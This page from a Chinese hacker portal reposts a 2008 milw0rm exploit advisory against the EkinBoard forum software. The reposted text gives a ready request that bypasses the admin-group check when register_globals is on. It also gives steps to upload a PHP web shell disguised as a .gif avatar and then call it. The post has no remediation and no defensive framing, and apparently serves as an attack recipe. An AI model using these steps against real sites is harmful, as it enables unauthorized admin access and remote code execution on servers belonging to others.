| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华盟网 >> 漏洞 >> web apps >> 正文 用户登录 新用户注册
远程文件认证绕过漏洞           ★★★ 【字体:
远程文件认证绕过漏洞
作者:milw0rm 文章来源:milw0rm 点击数: 更新时间:2008-1-9

  ----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ]

  EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass

  Eugene Minaev underwater@itdefence.ru

   .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .

  We can bypass admin authorization if register_globals on . All admin panel script include this code

  if(!in_array(2, $_groups)){

  die("

  You need to be an admin to access this page!

  ");

  }

  ?>

  test1.ru/skvoznoy/backup.php?_groups[]=2

  There is a bug in upload function . We can upload any file bypass filters . Name your shell like

  file.php.gif and select it as your avatar . Then check uploaded/avatars/filename_your_id.php

  ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

  # milw0rm.com [2008-01-07]

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇漏洞:

  • 下一篇漏洞:
  • 最新hack更新
    最新推荐资讯
    相关漏洞
    文件缓冲区溢出漏洞
    认证绕道漏洞
    提取网站文件泄露漏洞
    提取网站文件泄露漏洞
    FreeLyrics远程文件泄露
    远程任意文件上传漏洞
    任意文件上传漏洞
    文件上传漏洞
    任意文件的上传漏洞
    远程文件包含漏洞
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有